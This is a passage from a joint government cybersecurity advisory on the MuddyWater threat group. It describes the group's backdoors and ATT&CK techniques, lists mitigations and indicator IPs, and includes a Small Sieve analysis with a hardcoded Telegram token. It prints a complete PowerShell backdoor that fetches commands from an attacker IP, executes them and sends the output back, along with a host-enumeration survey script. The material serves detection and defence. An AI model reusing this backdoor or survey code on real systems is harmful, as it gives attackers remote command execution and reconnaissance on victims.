strings that have been reshuffled. This file collects [[TA0035](<https://attack.mitre.org/versions/v10/tactics/TA0035/>)] the victim system\u2019s IP address, computer name, and username [[T1005](<https://attack.mitre.org/versions/v10/techniques/T1005/>)]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, `http[:]88.119.170[.]124`, via an HTTP POST request [[T1041](<https://attack.mitre.org/versions/v10/techniques/T1041/>)].\n\n#### **Mori**\n\nMuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group\u2019s C2 infrastructure [[T1572](<https://attack.mitre.org/versions/v10/techniques/T1572/>)]. \n\nAccording to one sample analyzed by CISA, `FML.dll`, Mori uses a DLL written in C++ that is executed with `regsvr32.exe` with export `DllRegisterServer`; this DLL appears to be a component to another program. `FML.dll` contains approximately 200MB of junk data [[T1001.001](<https://attack.mitre.org/versions/v10/techniques/T1001/001/>)] in a resource directory 205, number 105. Upon execution, `FML.dll` creates a mutex, `0x50504060`, and performs the following tasks:\n\n * Deletes the file `FILENAME.old` and deletes file by registry value. The filename is the DLL file with a `.old` extension.\n * Resolves networking APIs from strings that are ADD-encrypted with the key` 0x05`.\n * Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.\n * Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>)].\n * Reads and/or writes data from the following Registry Keys, `HKLM\\Software\\NFC\\IPA` and `HKLM\\Software\\NFC\\(Default)`.\n\n#### **POWERSTATS**\n\nThis group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059>)]. \n\nCNMF has posted samples further detailing the different parts of MuddyWater\u2019s new suite of tools\u2014 along with JavaScript files used to establish connections back to malicious infrastructure\u2014to the malware aggregation tool and repository, [Virus Total](<http://www.virustotal.com/en/user/CYBERCOM_Malware_Alert>). Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.\n\nMuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability ([CVE-2020-1472](<https://vulners.com/cve/CVE-2020-1472>)) and the Microsoft Exchange memory corruption vulnerability ([CVE-2020-0688](<https://vulners.com/cve/CVE-2020-0688>)). See [CISA\u2019s Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>) for additional Iranian APT group-specific vulnerability exploits.\n\n#### **Survey Script**\n\nThe following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., `;;` in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.\n\n$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += \";;\";$ips = \"\";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"IPEnabled=True\" | % {$ips = $ips + \", \" + $_.IPAddress[0]};$S += $ips.substring(1);$S += \";;\";$S += $O.OSArchitecture;$S += \";;\";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += \";;\";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += \";;\";$S += $env:UserName;$S += \";;\";$AntiVirusProducts = Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;\n\n#### **Newly Identified PowerShell Backdoor**\n\nThe newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.\n\nfunction encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}\n\n### MITRE ATT&CK Techniques\n\n[MuddyWater](<https://attack.mitre.org/groups/G0069/>) uses the ATT&CK techniques listed in table 1.\n\n_Table 1: MuddyWater ATT&CK Techniques[[2](<https://attack.mitre.org/versions/v10/groups/G0069/>)]_\n\nTechnique Title | **ID** | **Use** \n---|---|--- \n**Reconnaissance** \nGather Victim Identity Information: Email Addresses | [T1589.002](<https://attack.mitre.org/versions/v10/techniques/T1589/002>) | MuddyWater has specifically targeted government agency employees with spearphishing emails. \n**Resource Development** \nAcquire Infrastructure: Web Services | [T1583.006](<https://attack.mitre.org/versions/v10/techniques/T1583/006/>) | MuddyWater has used file sharing services including OneHub to distribute tools. \nObtain Capabilities: Tool | [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>) | MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments. \n**Initial Access** \nPhishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>) | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments. \nPhishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>) | MuddyWater has sent targeted spearphishing emails with malicious links. \n**Execution** \nWindows Management Instrumentation | [T1047](<https://attack.mitre.org/versions/v10/techniques/T1047>) | MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information. \nCommand and Scripting Interpreter: PowerShell | [T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>) | MuddyWater has used PowerShell for execution. \nCommand and Scripting Interpreter: Windows Command Shell | [1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>) | MuddyWater has used a custom tool for creating reverse shells. \nCommand and Scripting Interpreter: Visual Basic | [T1059.005](<https://attack.mitre.org/versions/v10/techniques/T1059/005>) | MuddyWater has used Virtual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros. \nCommand and Scripting Interpreter: Python | [T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006>) | MuddyWater has used developed tools in Python including Out1. \nCommand and Scripting Interpreter: JavaScript | [T1059.007](<https://attack.mitre.org/versions/v10/techniques/T1059/007>) | MuddyWater has used JavaScript files to execute its POWERSTATS payload. \nExploitation for Client Execution | [T1203](<https://attack.mitre.org/versions/v10/techniques/T1203>) | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution. \nUser Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v10/techniques/T1204/001>) | MuddyWater has distributed URLs in phishing emails that link to lure documents. \nUser Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>) | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails. \nInter-Process Communication: Component Object Model | [T1559.001](<https://attack.mitre.org/versions/v10/techniques/T1559/001>) | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook. \nInter-Process Communication: Dynamic Data Exchange | [T1559.002](<https://attack.mitre.org/versions/v10/techniques/T1559/002>) | MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange. \n**Persistence** \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>) | MuddyWater has used scheduled tasks to establish persistence. \nOffice Application Startup: Office Template Macros | [T1137.001](<https://attack.mitre.org/versions/v10/techniques/T1137/001>) | MuddyWater has used a Word Template, `Normal.dotm`, for persistence. \nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>) | MuddyWater has added Registry Run key `KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding` to establish persistence. \n**Privilege Escalation** \nAbuse Elevation Control Mechanism: Bypass User Account Control | [T1548.002](<https://attack.mitre.org/versions/v10/techniques/T1548/002/>) | MuddyWater uses various techniques to bypass user account control. \nCredentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>) | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email. \nCredentials from Web Browsers | \n\n[T1555.003](<https://attack.mitre.org/versions/v10/techniques/T1055/003>)\n\n| MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers. \n**Defense Evasion** \nObfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>) | MuddyWater has used Daniel Bohannon\u2019s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands. \nSteganography | [T1027.003](<https://attack.mitre.org/versions/v10/techniques/T1027/003>) | MuddyWater has stored obfuscated JavaScript code in an image file named `temp.jpg`. \nCompile After Delivery | [T1027.004](<https://attack.mitre.org/versions/v10/techniques/T1027/004>) | MuddyWater has used the` .NET` `csc.exe` tool to compile executables from downloaded C# code. \nMasquerading: Match Legitimate Name or Location | [T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005>) | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection. \nDeobfuscate/Decode Files or Information | \n\n[T1140](<https://attack.mitre.org/versions/v10/techniques/T1140>)\n\n| MuddyWater decoded Base64-encoded PowerShell commands using a VBS file. \nSigned Binary Proxy Execution: CMSTP | \n\n[T1218.003](<https://attack.mitre.org/versions/v10/techniques/T1218/003>)\n\n| MuddyWater has used `CMSTP.exe` and a malicious `.INF` file to execute its POWERSTATS payload. \nSigned Binary Proxy Execution: Mshta | [T1218.005](<https://attack.mitre.org/versions/v10/techniques/T1218/005>) | MuddyWater has used `mshta.exe` to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution. \nSigned Binary Proxy Execution: Rundll32 | [T1218.011](<https://attack.mitre.org/versions/v10/techniques/T1218/011>) | MuddyWater has used malware that leveraged `rundll32.exe` in a Registry Run key to execute a `.dll`. \nExecution Guardrails | [T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>) | The Small Sieve payload used by MuddyWater will only execute correctly if the word \u201cPlatypus\u201d is passed to it on the command line. \nImpair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v10/techniques/T1562/001>) | MuddyWater can disable the system's local proxy settings. \n**Credential Access** \nOS Credential Dumping: LSASS Memory | [T1003.001](<https://attack.mitre.org/versions/v10/techniques/T1003/001>) | MuddyWater has performed credential dumping with Mimikatz and `procdump64.exe`. \nOS Credential Dumping: LSA Secrets | \n\n[T1003.004](<https://attack.mitre.org/versions/v10/techniques/T1003/004>)\n\n| MuddyWater has performed credential dumping with LaZagne. \nOS Credential Dumping: Cached Domain Credentials | [T1003.005](<https://attack.mitre.org/versions/v10/techniques/T1003/005>) | MuddyWater has performed credential dumping with LaZagne. \nUnsecured Credentials: Credentials In Files | \n\n[T1552.001](<https://attack.mitre.org/versions/v10/techniques/T1552/001>)\n\n| MuddyWater has run a tool that steals passwords saved in victim email. \n**Discovery** \nSystem Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v10/techniques/T1016>) | MuddyWater has used malware to collect the victim\u2019s IP address and domain name. \nSystem Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v10/techniques/T1033>) | MuddyWater has used malware that can collect the victim\u2019s username. \nSystem Network Connections Discovery | [T1049](<https://attack.mitre.org/versions/v10/techniques/T1049>) | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. \nProcess Discovery | [T1057](<https://attack.mitre.org/versions/v10/techniques/T1057>) | MuddyWater has used malware to obtain a list of running processes on the system. \nSystem Information Discovery | \n\n[T1082](<https://attack.mitre.org/versions/v10/techniques/T1082>)\n\n| MuddyWater has used malware that can collect the victim\u2019s OS version and machine name. \nFile and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>) | MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords \"Kasper,\" \"Panda,\" or \"ESET.\" \nAccount Discovery: Domain Account | [T1087.002](<https://attack.mitre.org/versions/v10/techniques/T1087/002/>) | MuddyWater has used `cmd.exe` net user/domain to enumerate domain users. \nSoftware Discovery | [T1518](<https://attack.mitre.org/versions/v10/techniques/T1518>) | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. \nSecurity Software Discovery | [T1518.001](<https://attack.mitre.org/versions/v10/techniques/T1518/001>) | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers. \n**Collection** \nScreen Capture | [T1113](<https://attack.mitre.org/versions/v10/techniques/T1113>) | MuddyWater has used malware that can capture screenshots of the victim\u2019s machine. \n \nArchive Collected Data: Archive via Utility\n\n| [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001/>) | MuddyWater has used the native Windows cabinet creation tool, `makecab.exe`, likely to compress stolen data to be uploaded. \n**Command and Control** \nApplication Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>) | MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS. \nProxy: External Proxy | [T1090.002](<https://attack.mitre.org/versions/v10/techniques/T1090/002>) | \n\nMuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. \n\nMuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2. \n \nWeb Service: Bidirectional Communication | [T1102.002](<https://attack.mitre.org/versions/v10/techniques/T1102/002>) | MuddyWater has used web services including OneHub to distribute remote access tools. \nMulti-Stage Channels | [T1104](<https://attack.mitre.org/versions/v10/techniques/T1104>) | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. \nIngress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v10/techniques/T1105>) | MuddyWater has used malware that can upload additional files to the victim\u2019s machine. \nData Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v10/techniques/T1132/001/>) | MuddyWater has used tools to encode C2 communications including Base64 encoding. \nData Encoding: Non-Standard Encoding | [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>) | MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic. \nRemote Access Software | [T1219](<https://attack.mitre.org/versions/v10/techniques/T1219>) | MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally. \n**Exfiltration** \nExfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v10/techniques/T1041>) | MuddyWater has used C2 infrastructure to receive exfiltrated data. \n \n### Mitigations\n\n#### Protective Controls and Architecture\n\n * **Deploy application control software to limit the applications and executable code that can be run by users. **Email attachments and files downloaded via links in emails often contain executable code. \n\n#### Identity and Access Management\n\n * **Use multifactor authentication where possible,** particularly for webmail, virtual private networks, and accounts that access critical systems. \n * **Limit the use of administrator privileges.** Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system\u2014once infected\u2014enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. \n\n#### Phishing Protection\n\n * **Enable antivirus and anti-malware software and update signature definitions in a timely manner.** Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. \n * **Be suspicious of unsolicited contact via email or social media from any individual you do not know personally.** Do not click on hyperlinks or open attachments in these communications.\n * **Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.**\n * **Train users through awareness and simulations to recognize and report phishing and social engineering attempts.** Identify and suspend access of user accounts exhibiting unusual activity.\n * **Adopt threat reputation services at the network device, operating system, application, and email service levels. **Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. \n\n#### Vulnerability and Configuration Management\n\n * **Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. **Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n### Additional Resources\n\n * For more information on Iranian government-sponsored malicious cyber activity, see [CISA's webpage \u2013 Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) and [CNMF's press release \u2013 Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>). \n * For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.\n * The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>) website for more information and how to report information securely.\n\n### References\n\n[[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>) \n[[2] MITRE ATT&CK: MuddyWater ](<https://attack.mitre.org/versions/v10/groups/G0069/>)\n\n### Caveats\n\nThe information you have accessed or received is being provided \u201cas is\u201d for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.\n\n### Purpose\n\nThis document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States\u2019 NSA agrees with this attribution and the details provided in this report.\n\n### Appendix A: IOCs\n\nThe following IP addresses are associated with MuddyWater activity:\n\n`5.199.133[.]149 \n45.142.213[.]17 \n45.142.212[.]61 \n45.153.231[.]104 \n46.166.129[.]159 \n80.85.158[.]49 \n87.236.212[.]22 \n88.119.170[.]124 \n88.119.171[.]213 \n89.163.252[.]232 \n95.181.161[.]49 \n95.181.161[.]50 \n164.132.237[.]65 \n185.25.51[.]108 \n185.45.192[.]228 \n185.117.75[.]34 \n185.118.164[.]21 \n185.141.27[.]143 \n185.141.27[.]248 \n185.183.96[.]7 \n185.183.96[.]44 \n192.210.191[.]188 \n192.210.226[.]128`\n\n### Appendix B: Small Sieve\n\n**Note:** the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.\n\n#### **Metadata**\n\n_Table 2: Gram.app.exe Metadata_\n\nFilename | gram_app.exe** ** \n---|--- \n**Description** | NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key \n**Size** | 16999598 bytes \n**MD5** | 15fa3b32539d7453a9a85958b77d4c95 \n**SHA-1** | 11d594f3b3cf8525682f6214acb7b7782056d282 \n**SHA-256** | b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 \n**Compile Time** | 2021-09-25 21:57:46 UTC \n \n_Table 3: Index.exe Metadata_\n\nFilename | index.exe \n---|--- \n**Description** | The final PyInstaller-bundled Python 3.9 backdoor \n**Size** | 17263089 bytes \n**MD5** | 5763530f25ed0ec08fb26a30c04009f1 \n**SHA-1** | 2a6ddf89a8366a262b56a251b00aafaed5321992 \n**SHA-256** | bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2 \n**Compile Time** | 2021-08-01 04:39:46 UTC \n \n#### \n\n#### **Functionality **\n\n##### **_Installation _**\n\nSmall Sieve is distributed as a large (16MB) NSIS installer named `gram_app.exe`, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary `index.exe` is installed in the user\u2019s `AppData/Roaming` directory and is added as a Run key in the registry to enabled persistence after reboot. \n\nThe installer then executes the backdoor with the \u201cPlatypus\u201d argument [[T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>)], which is also present in the registry persistence key: `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift`. \n\n##### **_Configuration _**\n\nThe backdoor attempts to restore previously initialized session data from `%LocalAppData%\\MicrosoftWindowsOutlookDataPlus.txt`. \n\nIf this file does not exist, then it uses the hardcoded values listed in table 4:\n\n_Table 4: Credentials and Session Values_\n\nField | **Value** | **Description** \n---|---|--- \nChat ID | 2090761833 | This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. \nBot ID | Random value between 10,000,000 and 90,000,000 | This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with `/com[Bot ID]` in order to be processed by the malware. \nTelegram Token | 2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY | This is the initial token used to authenticate each message to the Telegram Bot API. \n \n#### \n\n#### **Tasking **\n\nSmall Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host\u2019s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the** python-telegram-bot** module. \n\nTwo task formats are supported: \n\n * `/start `\u2013 no argument is passed; this causes the beacon information to be repeated. \n * `/com[BotID] [command]` \u2013 for issuing commands passed in the argument. \n\nThe following commands are supported by the second of these formats, as described in table 5: \n\n_Table 5: Supported Commands_\n\nCommand | Description \n---|--- \ndelete | This command causes the backdoor to exit; it does not remove persistence. \ndownload **url\u201d\u201dfilename** | The URL will be fetched and saved to the provided filename using the Python urllib module `urlretrieve` function. \nchange token**\u201d\u201dnewtoken** | The backdoor will reconnect to the Telegram Bot API using the provided token `newtoken`. This updated token will be stored in the encoded `MicrosoftWindowsOutlookDataPlus.txt` file. \ndisconnect | The original connection to Telegram is terminated. It is likely used after a `change token` command is issued. \n \nAny commands other than those detailed in table 5 are executed directly by passing them to `cmd.exe /c`, and the output is returned as a reply.\n\n#### **Defense Evasion **\n\n##### **_Anti-Sandbox _**\n\n##### ![](image/png;base64,iVBORw0KGgoAAAANSUhEUgAAApUAAACtCAYAAADh54ROAAAgAElEQVR4AezdB5hlRbU2YK5e9QZ/s16vWa8555wTiohIMpARRVBQjKgo5ggYEEVQECUrIkjOTGByzjnnnCNT//NWs5qazemenqEnUut5Zk6fs/eu8NUKX62qvfdeKaU0ffr0dMEFF6QZM2b4WmU3RWDNmjWpV69eacWKFbtpD2qzKwIVgYpARaAiUBHYXRHYS8Pnzp1bSeXuOoJFuxcvXpx69uyZNm3aVPxa/6wIVAQqAhWBikBFoCKw/RHYa/To0ZmInH/++Tljuf2rrDVsLwQmT56cRowYsb2Kr+VWBCoCFYGKQEWgIlAR6BCBvS688MLk39VXX52WLl3a4Yn1wK6PwIQJE5Il8CoVgYpARaAiUBGoCFQEdjQCey1YsCDNnz8/LVy4MF122WXp8MMPT4ceemj9t5thcNhhh6W99947HXzwwXXsdrOxq/ZW/U3VgaoDVQeqDuxOOoArnnPOOffjrHlPZfz6la98Je211171X8Wg6kDVgaoDVQeqDlQdqDpQdaBDHdhvv/2CPrZ/bkYqTzzxxHTKKaek8ePH138Vg6oDVQeqDlQdqDpQdaDqQNWB++nA2WefnQ444IB2Mhl/bEYqjz/++HTWWWfFsfpZEagIVAQqAhWBikBFoCJQEdgMgeuuuy7tv//+m/3my2ak8oQTTkhnnHHG/U6qP1QEKgIVgYpARaAiUBGoCFQEIPCPf/yjksqqChWBikBFoCJQEagIVAQqAg8MgUoqHxh+9eqKQEWgIlARqAhUBCoCFYGaqaw6UBGoCFQEKgIVgYpARaAi0B0I1Exld6BYy6gIVAQqAhWBikBFoCLwIEegksoHuQLU7lcEKgIVgYpARaAiUBHoDgQqqewOFGsZFYGKQEWgIlARqAhUBB7kCFRS+SBXgNr9ikBFoCJQEagIVAQqAt2BQCWV3YFiLaMiUBGoCFQEKgIVgYrAgxyBSiof5ApQu18RqAhUBCoCFYGKQEWgOxCopLI7UKxlVAQqAhWBikBFoCJQEXiQI1BJ5YNcAWr3KwIVgYpARaAiUBGoCHQHApVUdgeKtYyKQEWgIlARqAhUBCoCD3IEKql8kCtA7X5FoCJQEagIVAQqAhWB7kCgksruQLGWURGoCFQEKgIVgYpAReBBjkAllQ9yBajdrwhUBCoCFYGKQEWgItAdCFRS2R0o1jIqAhWBikBFoCJQEagIPMgRqKTyQa4AtfsVgYpARaAiUBGoCFQEugOBbieVEydOTF/+8pfTe97znvTmN7857bfffunss89Oa9as6Y72dljGqFGj0kc/+tE0ePDgdM8996STTjopnXPOOR2ev3HjxvT3v/89HXDAAelNb3pT/vf5z38+Xx8XzZs3L3384x/P58Vve8LnNddck4466qg0ZcqUPaE729yHRYsWpW9+85vpLW95Sx7nadOmbXNZe9KF7Ofmm29Ot99+e+7WunXr0pe+9KX0rW99a0/qZqd9YRv7779/6t27d6fndXbw6quvTp/4xCfS1KlT04YNGzr1SUOHDs31DRs2rLMid+ixH/3oR+mEE05IK1eu3KH11so6RuDuu+9Ohx122GZxqjz75z//efriF7+Y9W3OnDnpgx/8YLrjjjvKU+rfDwABvvHWW29Nt912W1q/fn3Lkk4//fRs69vKefjbf/3rX6lHjx65fL4ID7nrrrta1rer/ditpHL06NHpBS94QXr2s5+dPvOZz6Rvf/vbmVQ+/vGPTwcffHBau3btdus/Y3vMYx6TB9zAv/GNb8yBsFWFCOWPf/zj9KQnPSm9733vS1/5ylcSQvmyl70st/3KK6/Ml82ePTu9613vShdeeGGrYnbb35D85z3veWnEiBG7bR+6o+GXX355+u///u9MljiJpUuXdkexu30ZnNree++dfvrTn+a++H7EEUek448/frfvW1c7YJL66Ec/Ov3zn//s6iX3O+/SSy9N7373u5OJtgDTmU8S+NXXq1ev+5Wzs37gFw855JC0fPnyndWEWm8DAQmBZz3rWTnONQ7lr+xUMoe+zZw5M73yla9M119/fatT62/bgIDJIaKOP3QkeM+hhx6aVq1a1dEpnf5uMvC2t70tnX/++fm8kSNHpqc85Snpb3/7W6fX7SoHu5VUfu5zn0vPeMYz0oQJE3K2UCcFJBnDhz70oe0gIWv+cVb9+/fPjhSQZOHChZmh9+3bNy1evHgznGSW/I6xDxgwIPke0q9fv/T0pz893XnnnblumVJZqFZikB75yEfmjGrMNjZt2pRmzZqVXvziF2dD1DYKNGTIkBRti7LMHMwiZDHmz5+ff0Zkx40bl7MScZ5PZaivzILpe8+ePXMZDL8z0abASh8FnWjPtmJ13nnnpVe96lVJ4AyRKTEpgANBvB2HtXqb2QrfYeO4z84mDLCEwerVq6O6fL769CEErnDxr8Qrji9ZsiS3RZ1jxoyJnzv9hJ/y4DZjxoz2c9X1qU99Kj3xiU9Mf/7znzc71n7SvX8gBdEubQ6dcXjSpElJu+gBfTC5CZ1ollN+h5esVOBXlonsq6cU2S4Y0idC35zjejbUyoHNnTs395uuln33t3YrI4Qt0d9ly5blfrzoRS/K2ew+ffpkGx47dmw+Huf7HD9+fLutwiBEudOnT89lyfbDnt36e0tCt2GtT8rUztB3tsK3lKLd9DRwcYzuGAv9Hj58+GbYaBdcjKnjPkP032/65R9/ct1112WbUK/2KE/7Qm/5qPBJ2lz6JPWwDXoP1858knqf+cxn5qwSvfB98uTJ0bTsA9TNn5YCG2MTdhvHjIHr6U0pcX78xo4HDRrUroeljcKGzimLvsLAJ5zonXY27Z7fCL9g7OCkfc12R/0++Td6ps9WmmC1JYFzXKOepmir8oxJGUe0FybsJfw436fdRH9dp49hHytWrMj2A5vQkfCdzoEfnSjHS1lsmi3DyvFyLKId8Kev6hw4cGDLvqvLcedZQZD8EOdayXHHHZcTJXyuOkIn6Qed1hc6oDx622oizWeyWeewly2JeuCmn66Dawhc1ct29I9dxnjAUxxXDx3QLvi6Bi78W+nX6BC/b+zhzh8od8GCBbkMcSp0Rxu0x9g2M4auca7jzTgS/kH9fLlxgwfRT7/hCEceeWT+u/Q70Wd6EPqh/crUVziok92U/Yrroo6LL744/d///V/mJ/SHPb3kJS/JE9ywPf1qZVPqgCfbKH1RWcf2/rvbSCWltfwMDApdiu+HH354+sM